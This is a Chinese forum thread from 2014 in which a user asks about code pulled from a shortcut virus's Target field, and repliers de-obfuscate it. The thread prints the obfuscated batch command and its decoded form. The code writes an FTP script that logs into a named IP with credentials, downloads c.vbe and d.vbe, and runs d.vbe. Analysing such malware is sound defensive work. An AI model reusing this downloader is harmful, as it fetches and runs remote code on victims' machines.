日期:2014-05-17  浏览次数:20806 次

快捷方式病毒的一个小问题
下面的这段代码是从一个快捷方式病毒的属性 目标 里面提取出来的一段代码 
看了一顿貌似是连接一个ftp下载 c.vbe d.vbe 谁能再详细的讲解一下里面的代码 不是很清楚啊。

^>Z>C 是什么意思  

%coMSPEc% /c SET f=O 221.231.13&echO %A%%f%8.33^>Z>C&EcHo %a%tw520^>^>z>>C&EcHo %a%123123^>^>Z>>c&eChO %a%GeT c.vbe d.Vbe^>^>z>>c&eCHo %A%by^>^>Z>>C&SeT G=.co&EcHo %B%%S%s:Z>>c&ECho %o%rt d.vbe>>c&SeT S= -&sET B=ftp&SeT a=ECho &ReN c y.BAT&SEt O=sta&y



谢谢。



------解决方案--------------------
BatchFile code
set f=o 221.231.13
echo %a%%f%8.33^>z>c
echo %a%tw520^>^>z>>c
echo %a%123123^>^>z>>c
echo %a%get c.vbe d.vbe^>^>z>>c
echo %a%by^>^>z>>c
set g=.co
echo %b%%s%s:z>>c
echo %o%rt d.vbe>>c
set s= -
set b=ftp
set a=echo 
ren c y.bat
set o=sta
y

------解决方案--------------------
就不能自己动手弄下,大小写转换,&分行,获取echo生成的c,变量替换,有人就喜欢这样绕来绕去
%comspec% /c

set f=o 221.231.13
echo %a%%f%8.33^>z>c
echo %a%tw520^>^>z>>c
echo %a%123123^>^>z>>c
echo %a%get c.vbe d.vbe^>^>z>>c
echo %a%by^>^>z>>c
set g=.co
echo %b%%s%s:z>>c
echo %o%rt d.vbe>>c

set s=-
set b=ftp
set a=echo 
ren c y.bat
set o=sta
y

生成z文件,还就是ftp脚本
o 221.231.138.33
tw520
123123
get c.vbe d.vbe
by

调用z文件做事
ftp-s:z
start d.vbe

"^>Z>C 是什么意思",这个用于echo输出,echo xxx >x,不是重定向到x了,如重定向内容中有>就得加转义符